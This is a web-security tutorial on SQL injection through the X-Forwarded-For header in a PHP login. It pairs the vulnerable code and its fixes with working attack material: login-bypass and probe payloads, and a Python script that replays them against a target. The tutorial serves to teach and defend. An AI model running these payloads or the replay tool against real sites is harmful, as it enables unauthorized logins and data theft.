
X-Forwarded-For injection explained - Website security - 自学php

Source: 自学PHP网    Date: 2015-04-17 13:02


Requirements:

A site that uses X-Forwarded-For
Basic knowledge of string-based SQL injection
Live HTTP Headers (the Firefox extension used below to replay requests)
 
 
Introduction:

X-Forwarded-For is an HTTP request header often used to obtain the user's IP address even when the user connects through a proxy. Because it is a request header, any client can set it to an arbitrary value.

Example and explanation:
 
 
PHP Code:
function getip()
{
    if (isset($_SERVER['HTTP_X_FORWARDED_FOR']))
    {
        $ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
    }
    else
    {
        $ip = $_SERVER["REMOTE_ADDR"];
    }
 
This code puts what it takes to be the real client IP into $ip, preferring the client-supplied X-Forwarded-For header over REMOTE_ADDR (the actual TCP peer address).
 
 
PHP Code:
    if (preg_match("#^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}#",$ip))
    {
        return $ip;
    }
    else
    {
        return $_SERVER["REMOTE_ADDR"];
    }
}
 
This code is meant to check that $ip really is an IP address, but it is vulnerable. Why?

A regex is anchored with ^ at the beginning and $ at the end, and here the $ is missing, so the pattern only checks that the value starts with something that looks like a dotted quad. If your header value is 127.0.0.1 the check passes, but 127.0.0.1 followed by anything you like passes too, and the whole value, payload included, is returned unchanged. Two caveats for anyone fixing this: adding the $ only repairs the format check (999.999.999.999 would still pass, and in PCRE $ also matches before a trailing newline), and even a correctly validated value must be escaped or bound as a query parameter rather than concatenated into SQL.
 
Vulnerable PHP code:


PHP Code:
// sql() is presumably the application's own escaping helper (not shown on the page); the md5()
// hash contains no quotes, but the getip() result is concatenated into the query with no escaping at all.
$req = mysql_query("SELECT username,password FROM admin WHERE username='".sql($_POST['username'])."' AND password='".md5($_POST['password'])."' AND ip='".getip()."'");
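To see the two defects together (the start-only regex and the unescaped concatenation), here is a Python port of the page's getip() and login query run against an in-memory SQLite table standing in for MySQL. This is an added example, not the original article's code: the admin row, its password, and the 203.0.113.5 peer address are constructed, and getip_anchored() and getip_strict() are hypothetical hardened variants added for comparison. It also covers the probe step from the exploitation section, since a stray quote in the header breaks the query the same way here.

```python
import hashlib
import ipaddress
import re
import sqlite3

# The regex from the page's getip(): anchored at the start only (no trailing $),
# so anything that follows a dotted-quad prefix survives the check.
PREFIX_ONLY = re.compile(r"^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}")
# The same pattern with the missing end anchor added (hypothetical fix for comparison).
ANCHORED = re.compile(r"^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}$")

REMOTE_ADDR = "203.0.113.5"  # constructed: the TCP peer address the server sees


def getip_vulnerable(headers):
    """Port of the page's getip(): X-Forwarded-For is client-supplied and only
    its prefix is checked, so "127.0.0.1' OR '1'='1" is returned verbatim."""
    ip = headers.get("X-Forwarded-For", REMOTE_ADDR)
    return ip if PREFIX_ONLY.match(ip) else REMOTE_ADDR


def getip_anchored(headers):
    """With the $ added the payload is rejected, but out-of-range octets such as
    999.999.999.999 still pass, and $ also matches before a trailing newline."""
    ip = headers.get("X-Forwarded-For", REMOTE_ADDR)
    return ip if ANCHORED.match(ip) else REMOTE_ADDR


def getip_strict(headers):
    """Parse the value as an IPv4 address instead of pattern-matching it.
    (Behind a trusted proxy you would also take the address the proxy appended,
    not whatever the client put first in the comma-separated list.)"""
    ip = headers.get("X-Forwarded-For", REMOTE_ADDR).strip()
    try:
        return str(ipaddress.IPv4Address(ip))
    except ValueError:
        return REMOTE_ADDR


def vulnerable_query(username, password, ip):
    """The page's query, built by string concatenation; ip goes in unescaped."""
    return (
        "SELECT username,password FROM admin WHERE username='%s' "
        "AND password='%s' AND ip='%s'"
        % (username, hashlib.md5(password.encode()).hexdigest(), ip)
    )


def _admin_db():
    # Constructed fixture: one admin row, password md5("s3cret"), allowed ip 127.0.0.1.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE admin (username TEXT, password TEXT, ip TEXT)")
    db.execute("INSERT INTO admin VALUES (?, ?, ?)",
               ("admin", hashlib.md5(b"s3cret").hexdigest(), "127.0.0.1"))
    return db


def probe(headers):
    """The page's first exploitation step: does a quote in the header break the query?"""
    try:
        _admin_db().execute(vulnerable_query("admin", "x", getip_vulnerable(headers)))
        return False
    except sqlite3.OperationalError:
        return True


def login_vulnerable(username, password, headers):
    """Runs the page's query against the fixture; returns the matched username or None."""
    sql = vulnerable_query(username, password, getip_vulnerable(headers))
    row = _admin_db().execute(sql).fetchone()
    return row[0] if row else None


def login_fixed(username, password, headers):
    """Hardened version: bound parameters plus strict IP parsing."""
    row = _admin_db().execute(
        "SELECT username,password FROM admin WHERE username=? AND password=? AND ip=?",
        (username, hashlib.md5(password.encode()).hexdigest(), getip_strict(headers)),
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    payload = {"X-Forwarded-For": "127.0.0.1' OR '1'='1"}
    print("probe breaks query:", probe({"X-Forwarded-For": "127.0.0.1'"}))
    print("vulnerable login as nobody/wrong:", login_vulnerable("nobody", "wrong", payload))
    print("fixed login as nobody/wrong:", login_fixed("nobody", "wrong", payload))
```

Because ip='...' is the last AND condition in the WHERE clause, the OR payload makes the username and password conditions irrelevant, which is why login_vulnerable() returns the admin row for credentials that do not exist.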
 
Exploitation:

First open Live HTTP Headers, then reload the login page so the request is captured.

Note that the injection will be string based: the IP lands inside the single-quoted ip='...' literal.

Now click on the captured URL, click Replay, and add the header:

X-Forwarded-For: 127.0.0.1

Then add a quote after your IP address (X-Forwarded-For: 127.0.0.1') and replay again; the unbalanced quote breaks the query and a MySQL syntax error is displayed.

Now do your injection like any string-based one. The most important thing to understand is that the injection point is your IP in X-Forwarded-For, not a form field. Since ip='...' is the last AND condition of the WHERE clause, a payload such as 127.0.0.1' OR '1'='1 also makes the username and password checks irrelevant.
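The replay described above, done from a script rather than by hand, as an added example that is not part of the original article: it builds the login POST with the X-Forwarded-For header, carries the probe, boolean pair and bypass payloads that fit the page's query, and flags a response that contains the MySQL error the page says appears after the probe. The host, path, form field names and the sample error page are assumptions; replay() needs a real target and is the only part not exercised here.

```python
import http.client
import urllib.parse

# Fragments that reveal a broken query on a PHP/MySQL site of this era: the raw
# MySQL syntax error, or the mysql_* warnings that follow a failed mysql_query().
MYSQL_ERROR_MARKERS = (
    "You have an error in your SQL syntax",
    "mysql_fetch_array()",
    "mysql_num_rows()",
    "not a valid MySQL result resource",
)


def xff_payloads(base_ip="127.0.0.1"):
    """String-based payloads for the ip='...' literal. Each starts with a dotted
    quad so the page's start-only regex accepts it."""
    return {
        "probe":  base_ip + "'",              # unbalanced quote: expect a MySQL error
        "true":   base_ip + "' AND '1'='1",   # boolean pair for blind confirmation
        "false":  base_ip + "' AND '1'='2",
        "bypass": base_ip + "' OR '1'='1",    # ORs away the username/password conditions
    }


def build_login_request(host, path, xff, username="admin", password="x"):
    """Raw HTTP/1.1 bytes equivalent to the Live HTTP Headers replay: the login
    POST with an added X-Forwarded-For header (field names follow the page's query)."""
    body = urllib.parse.urlencode({"username": username, "password": password})
    head = [
        f"POST {path} HTTP/1.1",
        f"Host: {host}",
        f"X-Forwarded-For: {xff}",
        "Content-Type: application/x-www-form-urlencoded",
        f"Content-Length: {len(body)}",
        "Connection: close",
    ]
    return ("\r\n".join(head) + "\r\n\r\n" + body).encode()


def looks_like_sql_error(body):
    """True if the response shows the error the page says appears after the probe."""
    return any(marker in body for marker in MYSQL_ERROR_MARKERS)


def replay(host, path, xff, username="admin", password="x"):
    """Live version of build_login_request(): sends the request and classifies the reply."""
    conn = http.client.HTTPConnection(host, timeout=10)
    conn.request(
        "POST", path,
        body=urllib.parse.urlencode({"username": username, "password": password}),
        headers={
            "X-Forwarded-For": xff,
            "Content-Type": "application/x-www-form-urlencoded",
        },
    )
    resp = conn.getresponse()
    text = resp.read().decode("utf-8", "replace")
    conn.close()
    return resp.status, looks_like_sql_error(text), text


# Constructed sample response for the probe step, in the shape PHP's mysql extension prints.
SAMPLE_ERROR_PAGE = (
    "<b>Warning</b>: mysql_fetch_array(): supplied argument is not a valid MySQL "
    "result resource in <b>/var/www/login.php</b> on line <b>12</b><br />"
)


if __name__ == "__main__":
    for name, xff in xff_payloads().items():
        print(name, build_login_request("target.example", "/login.php", xff).split(b"\r\n")[2])
    print("sample page is an SQL error:", looks_like_sql_error(SAMPLE_ERROR_PAGE))
```

Run the probe first and keep the true/false pair to confirm the point is injectable before moving to UNION or blind extraction; the bypass payload alone already logs you in as the first admin row, because the ip condition is the last one in the WHERE clause.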

Hope you learned something new.

Author: http://hi.baidu.com/evilrapper/blog/item/518068a2b7b3148ccbefd0c5.html
